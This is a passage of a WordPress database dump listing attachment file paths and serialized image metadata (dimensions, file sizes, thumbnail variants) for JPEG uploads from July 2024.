(769,248,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1015;s:6:\"height\";i:811;s:4:\"file\";s:18:\"2024/07/154842.jpg\";s:8:\"filesize\";i:104979;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"154842-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20217;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"154842-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7425;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"154842-768x614.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87146;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"154842-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19546;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(770,249,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:18:\"2024/07/154845.jpg\";s:8:\"filesize\";i:141966;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"154845-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17833;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"154845-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126030;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"154845-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8292;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"154845-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80998;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"154845-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20434;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(771,250,'_wp_attached_file','2024/07/154855.jpg'),
(772,251,'_wp_attached_file','2024/07/154847.jpg'),
(773,250,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1067;s:6:\"height\";i:1533;s:4:\"file\";s:18:\"2024/07/154855.jpg\";s:8:\"filesize\";i:226439;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"154855-209x300.jpg\";s:5:\"width\";i:209;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19293;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"154855-713x1024.jpg\";s:5:\"width\";i:713;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151392;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"154855-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8530;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"154855-768x1103.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1103;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:168315;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"154855-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22106;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(774,251,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:18:\"2024/07/154847.jpg\";s:8:\"filesize\";i:142689;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"154847-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17672;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"154847-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126405;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"154847-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7493;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"154847-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80629;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"154847-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20580;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(775,252,'_wp_attached_file','2024/07/1578490.jpg'),
(776,252,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:961;s:6:\"height\";i:1704;s:4:\"file\";s:19:\"2024/07/1578490.jpg\";s:8:\"filesize\";i:168940;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"1578490-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12597;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"1578490-578x1024.jpg\";s:5:\"width\";i:578;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96349;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"1578490-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7136;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"1578490-768x1362.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1362;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150774;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"1578490-866x1536.jpg\";s:5:\"width\";i:866;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:182545;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"1578490-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15685;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(777,253,'_wp_attached_file','2024/07/1578485.jpg'),
(778,253,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1704;s:6:\"height\";i:961;s:4:\"file\";s:19:\"2024/07/1578485.jpg\";s:8:\"filesize\";i:217782;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"1578485-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15732;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"1578485-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122075;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"1578485-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8220;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"1578485-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76592;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"1578485-1536x866.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:866;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:228601;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"1578485-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20066;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(779,254,'_wp_attached_file','2024/07/S__15794195.jpg'),
(780,254,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:23:\"2024/07/S__15794195.jpg\";s:8:\"filesize\";i:715375;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__15794195-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20246;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__15794195-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121995;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__15794195-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8204;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__15794195-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80652;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__15794195-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:221325;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__15794195-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:341156;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__15794195-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19720;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(781,255,'_wp_attached_file','2024/07/S__15794198.jpg'),
(782,255,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:23:\"2024/07/S__15794198.jpg\";s:8:\"filesize\";i:720458;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__15794198-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20092;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__15794198-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122133;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__15794198-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8156;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__15794198-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80642;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__15794198-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:221870;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__15794198-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:342573;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__15794198-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19720;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(783,256,'_wp_attached_file','2024/07/S__15794204.jpg'),
(784,256,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:23:\"2024/07/S__15794204.jpg\";s:8:\"filesize\";i:892135;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__15794204-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20969;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__15794204-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141849;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__15794204-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8689;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__15794204-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91300;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__15794204-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:267078;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__15794204-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:418482;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__15794204-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21477;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(785,257,'_wp_attached_file','2024/07/S__15794210.jpg'),
(786,257,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:23:\"2024/07/S__15794210.jpg\";s:8:\"filesize\";i:1174076;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__15794210-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20034;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__15794210-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:159374;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__15794210-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7725;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__15794210-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97596;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"S__15794210-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:316768;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"S__15794210-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:516243;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__15794210-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21924;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(787,258,'_wp_attached_file','2024/07/S__29622275.jpg'),
(788,258,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2024/07/S__29622275.jpg\";s:8:\"filesize\";i:432595;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__29622275-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16604;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__29622275-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128844;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__29622275-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6822;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__29622275-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78597;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__29622275-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17642;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(789,259,'_wp_attached_file','2024/07/S__32849967.jpg'),
(790,259,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1079;s:6:\"height\";i:827;s:4:\"file\";s:23:\"2024/07/S__32849967.jpg\";s:8:\"filesize\";i:156540;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__32849967-300x230.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16047;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__32849967-1024x785.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:785;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93464;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__32849967-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6566;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__32849967-768x589.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:589;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61855;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__32849967-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15959;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(791,260,'_wp_attached_file','2024/07/S__68788232_0.jpg'),
(792,260,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:25:\"2024/07/S__68788232_0.jpg\";s:8:\"filesize\";i:303865;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__68788232_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18777;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__68788232_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113536;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788232_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7657;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__68788232_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74283;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788232_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17695;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(793,261,'_wp_attached_file','2024/07/S__68788230_0.jpg'),
(794,261,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/07/S__68788230_0.jpg\";s:8:\"filesize\";i:514481;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__68788230_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18888;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__68788230_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145094;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788230_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9888;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__68788230_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90691;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__68788230_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:269677;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__68788230_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24243;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(795,262,'_wp_attached_file','2024/07/S__68788233_0.jpg'),
